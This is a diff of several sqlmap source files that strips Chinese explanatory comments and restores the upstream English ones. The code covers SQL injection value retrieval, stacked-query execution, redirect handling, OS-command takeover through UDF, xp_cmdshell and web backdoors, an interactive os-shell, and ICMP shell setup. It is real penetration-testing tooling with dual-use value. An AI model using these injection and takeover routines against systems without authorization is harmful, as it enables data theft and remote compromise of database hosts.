    timeBasedCompare = getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)

-    # 从hash数据库中获取查询结果
    output = hashDBRetrieve(expression, checkConf=True)

-    # 如果查询结果为空，则执行查询
    if output is None:
        output = Request.queryPage(payload, timeBasedCompare=timeBasedCompare, raise404=False)

-        # 如果查询结果不为空，则将结果写入hash数据库
        if output is not None:
            hashDBWrite(expression, output)

@ -361,10 +349,8 @@ def _goUnion(expression, unpack=True, dump=False):
    injection vulnerability on the affected parameter.
    """

-    # 执行联合查询
    output = unionUse(expression, unpack=unpack, dump=dump)

-    # 如果输出是字符串类型，则解析输出
    if isinstance(output, six.string_types):
        output = parseUnionPage(output)

@ -378,7 +364,6 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
    affected parameter.
    """

-    # 如果配置了hex转换，并且数据库类型已知，则设置字符集类型为十六进制
    if conf.hexConvert and expected != EXPECTED.BOOL and Backend.getIdentifiedDbms():
        if not hasattr(queries[Backend.getIdentifiedDbms()], "hex"):
            warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms()
@ -387,39 +372,31 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
        else:
            charsetType = CHARSET_TYPE.HEXADECIMAL

-    # 设置安全字符编码和恢复值
    kb.safeCharEncode = safeCharEncode
    kb.resumeValues = resumeValue

-    # 将表达式中的关键字转换为大写
    for keyword in GET_VALUE_UPPERCASE_KEYWORDS:
        expression = re.sub(r"(?i)(\A|\(|\)|\s)%s(\Z|\(|\)|\s)" % keyword, r"\g<1>%s\g<2>" % keyword, expression)

-    # 如果抑制输出不为空，则设置当前线程的抑制输出
    if suppressOutput is not None:
        pushValue(getCurrentThreadData().disableStdOut)
        getCurrentThreadData().disableStdOut = suppressOutput

    try:
-        # 保存当前数据库和表
        pushValue(conf.db)
        pushValue(conf.tbl)

-        # 如果期望的输出是布尔类型
        if expected == EXPECTED.BOOL:
            forgeCaseExpression = booleanExpression = expression

-            # 如果表达式以SELECT开头，则将表达式转换为布尔表达式
            if expression.startswith("SELECT "):
                booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1")
            else:
                forgeCaseExpression = agent.forgeCaseStatement(expression)

-        # 如果直接执行
        if conf.direct:
            value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression)

-        # 如果使用了任何公开的技术
        elif any(isTechniqueAvailable(_) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True)):
            query = cleanQuery(expression)
            query = expandAsteriskForColumns(query)
@ -482,72 +459,52 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
                    warnMsg += "(%s) " % _
                    singleTimeWarnMessage(warnMsg)

-            # 如果启用了盲注，并且布尔技术可用，且未找到结果，则设置布尔技术
            if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found:
                setTechnique(PAYLOAD.TECHNIQUE.BOOLEAN)

-                # 如果期望的结果是布尔值，则使用_goBooleanProxy函数获取结果
                if expected == EXPECTED.BOOL:
                    value = _goBooleanProxy(booleanExpression)
-                # 否则，使用_goInferenceProxy函数获取结果
                else:
                    value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)

-                # 计数加一
                count += 1
-                # 如果结果不为空，或者结果为空且期望结果为空，或者计数大于等于最大技术数，则设置found为True
                found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE

-            # 如果启用了时间注入，并且时间或堆栈技术可用，且未找到结果，则设置时间或堆栈技术
            if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found:
-                # 使用正则表达式匹配表达式中的FROM和ORDER BY
                match = re.search(r"\bFROM\b ([^ ]+).+ORDER BY ([^ ]+)", expression)
-                # 将匹配结果设置为kb.responseTimeMode
                kb.responseTimeMode = "%s|%s" % (match.group(1), match.group(2)) if match else None

-                # 如果时间技术可用，则设置时间技术
                if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME):
                    setTechnique(PAYLOAD.TECHNIQUE.TIME)
-                # 否则，设置堆栈技术
                else:
                    setTechnique(PAYLOAD.TECHNIQUE.STACKED)

-                # 如果期望的结果是布尔值，则使用_goBooleanProxy函数获取结果
                if expected == EXPECTED.BOOL:
                    value = _goBooleanProxy(booleanExpression)
-                # 否则，使用_goInferenceProxy函数获取结果
                else:
                    value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)
        else:
-            # 如果没有找到可用的注入类型，则抛出异常
            errMsg = "none of the injection types identified can be "
            errMsg += "leveraged to retrieve queries output"
            raise SqlmapNotVulnerableException(errMsg)

-    # 最后，恢复kb.resumeValues和kb.responseTimeMode的值
    finally:
        kb.resumeValues = True
        kb.responseTimeMode = None

-        # 从kb中弹出tbl和db的值
        conf.tbl = popValue()
        conf.db = popValue()

-        # 如果suppressOutput不为None，则禁用标准输出
        if suppressOutput is not None:
            getCurrentThreadData().disableStdOut = popValue()

-    # 设置kb.safeCharEncode为False
    kb.safeCharEncode = False

-    # 如果没有启用测试模式、dummy、离线、noCast、hexConvert，且结果为空，且数据库已识别，且kb.fingerprinted为True，则抛出异常或警告
    if not any((kb.testMode, conf.dummy, conf.offline, conf.noCast, conf.hexConvert)) and value is None and Backend.getDbms() and conf.dbmsHandler and kb.fingerprinted:
-        # 如果启用了abortOnEmpty，则抛出异常
        if conf.abortOnEmpty:
            errMsg = "aborting due to empty data retrieval"
            logger.critical(errMsg)
            raise SystemExit
-        # 否则，抛出警告
        else:
            warnMsg = "in case of continuous data retrieval problems you are advised to try "
            warnMsg += "a switch '--no-cast' "
@ -586,35 +543,24 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
    return extractExpectedValue(value, expected)

 def goStacked(expression, silent=False):
-    # 检查是否已经设置了堆叠注入技术
    if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data:
-        # 如果已经设置了堆叠注入技术，则直接设置
        setTechnique(PAYLOAD.TECHNIQUE.STACKED)
    else:
-        # 如果没有设置堆叠注入技术，则遍历所有公开的技术
        for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True):
-            # 获取技术的数据
            _ = getTechniqueData(technique)
-            # 如果数据存在，并且标题中包含"stacked"，则设置该技术
            if _ and "stacked" in _["title"].lower():
                setTechnique(technique)
                break

-    # 清理查询语句
    expression = cleanQuery(expression)

-    # 如果配置了直接执行，则直接执行查询语句
    if conf.direct:
        return direct(expression)

-    # 构造查询语句
    query = agent.prefixQuery(";%s" % expression)
    query = agent.suffixQuery(query)
-    # 构造payload
    payload = agent.payload(newValue=query)
-    # 执行查询语句
    Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper())

 def checkBooleanExpression(expression, expectingNone=True):
-    # 检查布尔表达式
    return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
--- a/src/sqlmap-master/lib/request/methodrequest.py
+++ b/src/sqlmap-master/lib/request/methodrequest.py
@ -5,27 +5,16 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入getText函数,用于文本转换
 from lib.core.convert import getText
-# 导入urllib库并重命名为_urllib,用于处理URL请求
 from thirdparty.six.moves import urllib as _urllib

 class MethodRequest(_urllib.request.Request):
    """
-    继承自urllib.request.Request类
-    用于创建HTTP请求(HEAD/PUT/DELETE等)的自定义请求类
+    Used to create HEAD/PUT/DELETE/... requests with urllib
    """

    def set_method(self, method):
-        # 设置HTTP请求方法
-        # 参数method: 字符串类型,表示HTTP方法(如GET、POST、HEAD等)
-        # getText()将输入转换为文本格式
-        # upper()将文本转为大写
-        self.method = getText(method.upper())  # Python3兼容性处理
+        self.method = getText(method.upper())  # Dirty hack for Python3 (may it rot in hell!)

    def get_method(self):
-        # 获取HTTP请求方法
-        # getattr用于获取对象的属性
-        # 如果self.method存在就返回它
-        # 否则返回父类Request默认的get_method()方法的结果
        return getattr(self, 'method', _urllib.request.Request.get_method(self))
--- a/src/sqlmap-master/lib/request/pkihandler.py
+++ b/src/sqlmap-master/lib/request/pkihandler.py
@ -5,57 +5,25 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的模块
-from lib.core.data import conf  # 导入配置信息
-from lib.core.common import getSafeExString  # 导入安全字符串处理函数
-from lib.core.exception import SqlmapConnectionException  # 导入SQL注入连接异常类
-from thirdparty.six.moves import http_client as _http_client  # 导入HTTP客户端
-from thirdparty.six.moves import urllib as _urllib  # 导入URL处理库
+from lib.core.data import conf
+from lib.core.common import getSafeExString
+from lib.core.exception import SqlmapConnectionException
+from thirdparty.six.moves import http_client as _http_client
+from thirdparty.six.moves import urllib as _urllib

 class HTTPSPKIAuthHandler(_urllib.request.HTTPSHandler):
-    """
-    HTTPS PKI认证处理器类
-    继承自urllib的HTTPSHandler类,用于处理带客户端证书的HTTPS请求
-    """
    def __init__(self, auth_file):
-        """
-        初始化函数
-        参数:
-            auth_file: 认证文件路径,包含客户端证书和私钥
-        """
-        _urllib.request.HTTPSHandler.__init__(self)  # 调用父类初始化
-        self.auth_file = auth_file  # 保存认证文件路径
+        _urllib.request.HTTPSHandler.__init__(self)
+        self.auth_file = auth_file

    def https_open(self, req):
-        """
-        处理HTTPS请求的方法
-        参数:
-            req: HTTPS请求对象
-        返回:
-            处理后的HTTPS连接
-        """
        return self.do_open(self.getConnection, req)

    def getConnection(self, host, timeout=None):
-        """
-        建立HTTPS连接的方法
-        参数:
-            host: 目标主机
-            timeout: 超时时间,默认为None
-        返回:
-            HTTPS连接对象
-        异常:
-            SqlmapConnectionException: 连接异常
-        """
        try:
-            # 创建带客户端证书的HTTPS连接
-            # 参考文档: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
-            return _http_client.HTTPSConnection(host, 
-                                              cert_file=self.auth_file,  # 证书文件
-                                              key_file=self.auth_file,   # 私钥文件
-                                              timeout=conf.timeout)      # 超时设置
+            # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
+            return _http_client.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)
        except IOError as ex:
-            # 如果出现IO错误(比如证书文件无法读取等)
            errMsg = "error occurred while using key "
            errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex))
-            raise SqlmapConnectionException(errMsg)  # 抛出SQL注入连接异常
+            raise SqlmapConnectionException(errMsg)
--- a/src/sqlmap-master/lib/request/rangehandler.py
+++ b/src/sqlmap-master/lib/request/rangehandler.py
@ -5,44 +5,25 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入自定义的SQL映射连接异常类
 from lib.core.exception import SqlmapConnectionException
-# 导入urllib库并重命名为_urllib,用于处理HTTP请求
 from thirdparty.six.moves import urllib as _urllib

 class HTTPRangeHandler(_urllib.request.BaseHandler):
    """
-    处理HTTP Range头部的处理器类。
-    Range头部允许客户端请求资源的部分内容而不是整个资源。
-    
-    参考文档: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file
+    Handler that enables HTTP Range headers.
+
+    Reference: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file
    """

    def http_error_206(self, req, fp, code, msg, hdrs):
-        """
-        处理206状态码(部分内容响应)
-        参数说明:
-        req: 原始请求对象
-        fp: 类文件对象,包含响应内容
-        code: HTTP状态码(206)
-        msg: 响应消息
-        hdrs: 响应头部信息
-        """
-        # 创建并返回一个包含部分内容的响应对象
+        # 206 Partial Content Response
        r = _urllib.response.addinfourl(fp, hdrs, req.get_full_url())
-        r.code = code  # 设置响应状态码
-        r.msg = msg    # 设置响应消息
+        r.code = code
+        r.msg = msg
        return r

    def http_error_416(self, req, fp, code, msg, hdrs):
-        """
-        处理416状态码(请求范围不满足)
-        当请求的范围超出资源的实际范围时会触发此错误
-        
-        参数说明与http_error_206相同
-        """
-        # 构建错误信息
+        # HTTP's Range Not Satisfiable error
        errMsg = "there was a problem while connecting "
        errMsg += "target ('406 - Range Not Satisfiable')"
-        # 抛出SQL映射连接异常
        raise SqlmapConnectionException(errMsg)
--- a/src/sqlmap-master/lib/request/redirecthandler.py
+++ b/src/sqlmap-master/lib/request/redirecthandler.py
@ -5,13 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的标准库和第三方库
 import io
 import re
 import time
 import types

-# 导入自定义工具函数
 from lib.core.common import getHostHeader
 from lib.core.common import getSafeExString
 from lib.core.common import logHTTPTraffic
@ -38,17 +36,7 @@ from thirdparty import six
 from thirdparty.six.moves import urllib as _urllib

 class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):
-    """
-    智能重定向处理器类,继承自urllib的HTTPRedirectHandler
-    用于处理HTTP重定向响应(301/302/303/307等)
-    """
-
    def _get_header_redirect(self, headers):
-        """
-        从响应头中获取重定向URL
-        :param headers: HTTP响应头
-        :return: 重定向URL或None
-        """
        retVal = None

        if headers:
@ -60,21 +48,13 @@ class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):
        return retVal

    def _ask_redirect_choice(self, redcode, redurl, method):
-        """
-        询问用户是否要跟随重定向
-        :param redcode: 重定向状态码
-        :param redurl: 重定向URL
-        :param method: HTTP请求方法
-        """
        with kb.locks.redirect:
-            # 如果还没有做出重定向选择
            if kb.choices.redirect is None:
                msg = "got a %d redirect to " % redcode
                msg += "'%s'. Do you want to follow? [Y/n] " % redurl

                kb.choices.redirect = REDIRECTION.YES if readInput(msg, default='Y', boolean=True) else REDIRECTION.NO

-            # 如果是POST请求导致的重定向,询问是否要重发POST数据
            if kb.choices.redirect == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None:
                msg = "redirect is a result of a "
                msg += "POST request. Do you want to "
@ -87,49 +67,31 @@ class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):
                self.redirect_request = self._redirect_request

    def _redirect_request(self, req, fp, code, msg, headers, newurl):
-        """
-        创建重定向请求
-        :return: 新的Request对象
-        """
        return _urllib.request.Request(newurl.replace(' ', '%20'), data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host() if hasattr(req, "get_origin_req_host") else req.origin_req_host)

    def http_error_302(self, req, fp, code, msg, headers):
-        """
-        处理302重定向响应
-        :param req: 原始请求
-        :param fp: 响应文件对象
-        :param code: 状态码
-        :param msg: 状态消息
-        :param headers: 响应头
-        :return: 处理后的响应对象
-        """
        start = time.time()
        content = None
        forceRedirect = False
-        # 如果未忽略重定向,则获取重定向URL
        redurl = self._get_header_redirect(headers) if not conf.ignoreRedirects else None

-        # 读取响应内容
        try:
            content = fp.read(MAX_CONNECTION_TOTAL_SIZE)
-        except:  # 处理不完整读取
+        except:  # e.g. IncompleteRead
            content = b""
        finally:
            if content:
-                try:  # 尝试将内容写回读取缓冲区以便后续使用
+                try:  # try to write it back to the read buffer so we could reuse it in further steps
                    fp.fp._rbuf.truncate(0)
                    fp.fp._rbuf.write(content)
                except:
                    pass

-        # 解码响应内容
        content = decodePage(content, headers.get(HTTP_HEADER.CONTENT_ENCODING), headers.get(HTTP_HEADER.CONTENT_TYPE))

-        # 记录重定向信息
        threadData = getCurrentThreadData()
        threadData.lastRedirectMsg = (threadData.lastRequestUID, content)

-        # 构建重定向日志消息
        redirectMsg = "HTTP redirect "
        redirectMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, getUnicode(msg))

@ -142,39 +104,31 @@ class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):
        if content:
            redirectMsg += "\r\n\r\n%s" % getUnicode(content[:MAX_CONNECTION_READ_SIZE])

-        # 记录HTTP流量日志
        logHTTPTraffic(threadData.lastRequestMsg, redirectMsg, start, time.time())
        logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg)

        if redurl:
            try:
-                # 如果重定向URL是相对路径,转换为绝对路径
                if not _urllib.parse.urlsplit(redurl).netloc:
                    redurl = _urllib.parse.urljoin(req.get_full_url(), redurl)

-                # 检查是否存在无限重定向循环
                self._infinite_loop_check(req)
                if conf.scope:
-                    # 检查重定向URL是否在指定范围内
                    if not re.search(conf.scope, redurl, re.I):
                        redurl = None
                    else:
                        forceRedirect = True
                else:
-                    # 询问用户是否跟随重定向
                    self._ask_redirect_choice(code, redurl, req.get_method())
            except ValueError:
                redurl = None
                result = fp

        if redurl and (kb.choices.redirect == REDIRECTION.YES or forceRedirect):
-            # 解析响应
            parseResponse(content, headers)

-            # 更新请求头中的Host
            req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl)
            if headers and HTTP_HEADER.SET_COOKIE in headers:
-                # 处理Cookie
                cookies = dict()
                delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER
                last = None
@ -191,12 +145,11 @@ class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):
                req.headers[HTTP_HEADER.COOKIE] = delimiter.join("%s=%s" % (key, cookies[key]) for key in cookies)

            try:
-                # 执行重定向请求
                result = _urllib.request.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
            except _urllib.error.HTTPError as ex:
                result = ex

-                # 处理特殊情况的hack
+                # Dirty hack for https://github.com/sqlmapproject/sqlmap/issues/4046
                try:
                    hasattr(result, "read")
                except KeyError:
@ -204,6 +157,7 @@ class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):
                        pass
                    result = _()

+                # Dirty hack for http://bugs.python.org/issue15701
                try:
                    result.info()
                except AttributeError:
@ -215,7 +169,7 @@ class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):
                if not hasattr(result, "read"):
                    def _(self, length=None):
                        try:
-                            retVal = getSafeExString(ex)
+                            retVal = getSafeExString(ex)        # Note: pyflakes mistakenly marks 'ex' as undefined (NOTE: tested in both Python2 and Python3)
                        except:
                            retVal = ""
                        return getBytes(retVal)
@ -234,23 +188,15 @@ class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):
        else:
            result = fp

-        # 记录最后的重定向URL
        threadData.lastRedirectURL = (threadData.lastRequestUID, redurl)

-        # 设置结果属性
        result.redcode = code
        result.redurl = getUnicode(redurl) if six.PY3 else redurl
        return result

-    # 其他重定向状态码使用相同的处理方法
    http_error_301 = http_error_303 = http_error_307 = http_error_302

    def _infinite_loop_check(self, req):
-        """
-        检查是否存在无限重定向循环
-        :param req: 请求对象
-        :raises: SqlmapConnectionException 如果检测到无限循环
-        """
        if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS):
            errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys())
            errMsg += "Please check all provided parameters and/or provide missing ones"
--- a/src/sqlmap-master/lib/request/templates.py
+++ b/src/sqlmap-master/lib/request/templates.py
@ -5,59 +5,17 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入必要的模块
-# kb (Knowledge Base) 是一个全局对象,用于存储程序运行时的各种状态和数据
-# 比如原始页面内容、错误状态、页面模板缓存等信息都存储在这里
 from lib.core.data import kb
-
-# 从connect模块导入Request类并重命名为Request
-# Request类用于发送HTTP请求,是与目标网站交互的核心类
 from lib.request.connect import Connect as Request

 def getPageTemplate(payload, place):
-    """
-    获取页面模板的函数
-    
-    这个函数的主要作用是:
-    1. 根据给定的SQL注入payload和注入位置获取目标页面
-    2. 将页面内容缓存起来避免重复请求
-    3. 返回页面内容和错误状态信息
-    
-    参数说明:
-        payload: SQL注入的载荷,即要注入的SQL代码
-        place: 注入点的位置,表示在请求中的哪个位置进行注入
-               (比如URL参数、POST数据、Cookie等)
-    
-    返回值:
-        返回一个包含两个元素的元组:
-        1. 页面内容 - 可能是原始页面或注入后的页面
-        2. 错误状态 - 表示页面解析是否出现错误
-    """
-    # 初始化返回值
-    # kb.originalPage 存储了未注入时的原始页面内容
-    # kb.errorIsNone 表示错误检查的状态
    retVal = (kb.originalPage, kb.errorIsNone)

-    # 只有当payload和place都不为空时才执行注入操作
    if payload and place:
-        # 检查这个payload和place的组合是否已经在缓存中
-        # kb.pageTemplates是一个字典,用于缓存不同注入组合的结果
        if (payload, place) not in kb.pageTemplates:
-            # 如果没有缓存,则发送新的请求
-            # Request.queryPage方法用于发送带有注入payload的请求
-            # content=True 表示需要返回页面内容
-            # raise404=False 表示遇到404错误时不抛出异常
-            # 返回值中的page是页面内容,其他两个值用下划线忽略
            page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
-            
-            # 将结果存入缓存
-            # page 是获取到的页面内容
-            # kb.lastParserStatus is None 表示页面解析是否成功
-            # (None表示解析成功,非None表示解析出错)
            kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)

-        # 从缓存中获取之前存储的结果
        retVal = kb.pageTemplates[(payload, place)]

-    # 返回页面内容和错误状态
    return retVal
--- a/src/sqlmap-master/lib/takeover/abstraction.py
+++ b/src/sqlmap-master/lib/takeover/abstraction.py
@ -5,7 +5,6 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入必要的模块
 from __future__ import print_function

 import sys
@ -34,51 +33,36 @@ from thirdparty.six.moves import input as _input

 class Abstraction(Web, UDF, XP_cmdshell):
    """
-    这个类定义了一个抽象层,用于操作系统接管功能
-    继承了Web、UDF和XP_cmdshell类的功能
+    This class defines an abstraction layer for OS takeover functionalities
+    to UDF / XP_cmdshell objects
    """

    def __init__(self):
-        # 初始化环境状态标志
        self.envInitialized = False
-        # 是否总是获取命令输出的标志
        self.alwaysRetrieveCmdOutput = False

-        # 调用父类的初始化方法
        UDF.__init__(self)
        Web.__init__(self)
        XP_cmdshell.__init__(self)

    def execCmd(self, cmd, silent=False):
-        """
-        执行系统命令的方法
-        根据不同的数据库类型选择不同的执行方式
-        """
        if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
-            # PostgreSQL使用COPY命令执行
            self.copyExecCmd(cmd)

        elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail):
-            # 如果有Web后门URL且不支持堆叠查询或UDF失败,使用Web后门执行
            self.webBackdoorRunCmd(cmd)

        elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
-            # MySQL和PostgreSQL使用用户自定义函数执行
            self.udfExecCmd(cmd, silent=silent)

        elif Backend.isDbms(DBMS.MSSQL):
-            # SQL Server使用xp_cmdshell扩展存储过程执行
            self.xpCmdshellExecCmd(cmd, silent=silent)

        else:
-            # 不支持的数据库类型
            errMsg = "Feature not yet implemented for the back-end DBMS"
            raise SqlmapUnsupportedFeatureException(errMsg)

    def evalCmd(self, cmd, first=None, last=None):
-        """
-        执行命令并返回结果的方法
-        """
        retVal = None

        if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
@ -100,13 +84,9 @@ class Abstraction(Web, UDF, XP_cmdshell):
        return safechardecode(retVal)

    def runCmd(self, cmd):
-        """
-        运行命令并处理输出的方法
-        """
        choice = None

        if not self.alwaysRetrieveCmdOutput:
-            # 询问用户是否需要获取命令输出
            message = "do you want to retrieve the command standard "
            message += "output? [Y/n/a] "
            choice = readInput(message, default='Y').upper()
@ -115,7 +95,6 @@ class Abstraction(Web, UDF, XP_cmdshell):
                self.alwaysRetrieveCmdOutput = True

        if choice == 'Y' or self.alwaysRetrieveCmdOutput:
-            # 获取并显示命令输出
            output = self.evalCmd(cmd)

            if output:
@ -123,20 +102,15 @@ class Abstraction(Web, UDF, XP_cmdshell):
            else:
                dataToStdout("No output\n")
        else:
-            # 仅执行命令不获取输出
            self.execCmd(cmd)

    def shell(self):
-        """
-        提供交互式shell的方法
-        """
        if self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail):
            infoMsg = "calling OS shell. To quit type "
            infoMsg += "'x' or 'q' and press ENTER"
            logger.info(infoMsg)

        else:
-            # 根据不同数据库类型显示相应的提示信息
            if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
                infoMsg = "going to use 'COPY ... FROM PROGRAM ...' "
                infoMsg += "command execution"
@ -161,15 +135,12 @@ class Abstraction(Web, UDF, XP_cmdshell):
            infoMsg += "'x' or 'q' and press ENTER"
            logger.info(infoMsg)

-        # 设置命令自动完成
        autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX)

-        # shell的主循环
        while True:
            command = None

            try:
-                # 获取用户输入的命令
                command = _input("os-shell> ")
                command = getUnicode(command, encoding=sys.stdin.encoding)
            except KeyboardInterrupt:
@ -191,9 +162,6 @@ class Abstraction(Web, UDF, XP_cmdshell):
            self.runCmd(command)

    def _initRunAs(self):
-        """
-        初始化以其他用户身份运行的功能
-        """
        if not conf.dbmsCred:
            return

@ -207,7 +175,6 @@ class Abstraction(Web, UDF, XP_cmdshell):
            return

        if Backend.isDbms(DBMS.MSSQL):
-            # SQL Server需要启用OPENROWSET功能
            msg = "on Microsoft SQL Server 2005 and 2008, OPENROWSET function "
            msg += "is disabled by default. This function is needed to execute "
            msg += "statements as another DBMS user since you provided the "
@ -218,24 +185,23 @@ class Abstraction(Web, UDF, XP_cmdshell):
                expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1")
                inject.goStacked(expression)

+        # TODO: add support for PostgreSQL
+        # elif Backend.isDbms(DBMS.PGSQL):
+        #     expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1")
+        #     inject.goStacked(expression)
+
    def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):
-        """
-        初始化环境的方法
-        """
        self._initRunAs()

        if self.envInitialized and not forceInit:
            return

        if web:
-            # 初始化Web环境
            self.webInit()
        else:
-            # 检查数据库操作系统
            self.checkDbmsOs(detailed)

            if mandatory and not self.isDba():
-                # 警告用户当前可能没有足够的权限
                warnMsg = "functionality requested probably does not work because "
                warnMsg += "the current session user is not a database administrator"

@ -247,7 +213,6 @@ class Abstraction(Web, UDF, XP_cmdshell):

                logger.warning(warnMsg)

-            # 根据不同数据库类型初始化相应功能
            if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
                success = True
            elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
--- a/src/sqlmap-master/lib/takeover/icmpsh.py
+++ b/src/sqlmap-master/lib/takeover/icmpsh.py
@ -5,13 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的Python标准库
 import os
 import re
 import socket
 import time

-# 导入自定义模块和函数
 from extra.icmpsh.icmpsh_m import main as icmpshmaster
 from lib.core.common import getLocalIP
 from lib.core.common import getRemoteIP
@ -26,125 +24,94 @@ from lib.core.exception import SqlmapDataException

 class ICMPsh(object):
    """
-    这个类定义了调用icmpsh工具的方法,用于插件功能
+    This class defines methods to call icmpsh for plugins.
    """

    def _initVars(self):
-        """
-        初始化类的成员变量
-        """
-        self.lhostStr = None  # 本地主机地址字符串
-        self.rhostStr = None  # 远程主机地址字符串
-        self.localIP = getLocalIP()  # 获取本地IP地址
-        self.remoteIP = getRemoteIP() or conf.hostname  # 获取远程IP地址,如果获取失败则使用配置的主机名
-        # 设置icmpsh slave程序的路径
+        self.lhostStr = None
+        self.rhostStr = None
+        self.localIP = getLocalIP()
+        self.remoteIP = getRemoteIP() or conf.hostname
        self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe_"))

    def _selectRhost(self):
-        """
-        选择远程主机地址
-        返回: 用户输入的远程主机地址
-        """
        address = None
-        message = "what is the back-end DBMS address? "  # 提示用户输入数据库地址
+        message = "what is the back-end DBMS address? "

        if self.remoteIP:
-            message += "[Enter for '%s' (detected)] " % self.remoteIP  # 如果检测到远程IP,则显示默认值
+            message += "[Enter for '%s' (detected)] " % self.remoteIP

        while not address:
-            address = readInput(message, default=self.remoteIP)  # 读取用户输入
+            address = readInput(message, default=self.remoteIP)

-            if conf.batch and not address:  # 如果是批处理模式且没有提供地址,则报错
+            if conf.batch and not address:
                raise SqlmapDataException("remote host address is missing")

        return address

    def _selectLhost(self):
-        """
-        选择本地主机地址
-        返回: 用户输入的本地主机地址
-        """
        address = None
        message = "what is the local address? "

        if self.localIP:
-            message += "[Enter for '%s' (detected)] " % self.localIP  # 如果检测到本地IP,则显示默认值
+            message += "[Enter for '%s' (detected)] " % self.localIP

        valid = None
        while not valid:
            valid = True
-            address = readInput(message, default=self.localIP or "")  # 读取用户输入
+            address = readInput(message, default=self.localIP or "")

            try:
-                socket.inet_aton(address)  # 验证IP地址格式是否正确
+                socket.inet_aton(address)
            except socket.error:
                valid = False
            finally:
                valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None

-            if conf.batch and not address:  # 批处理模式下没有地址则报错
+            if conf.batch and not address:
                raise SqlmapDataException("local host address is missing")
-            elif address and not valid:  # 地址格式无效则警告
+            elif address and not valid:
                warnMsg = "invalid local host address"
                logger.warning(warnMsg)

        return address

    def _prepareIngredients(self, encode=True):
-        """
-        准备ICMP shell所需的参数
-        """
        self.localIP = getattr(self, "localIP", None)
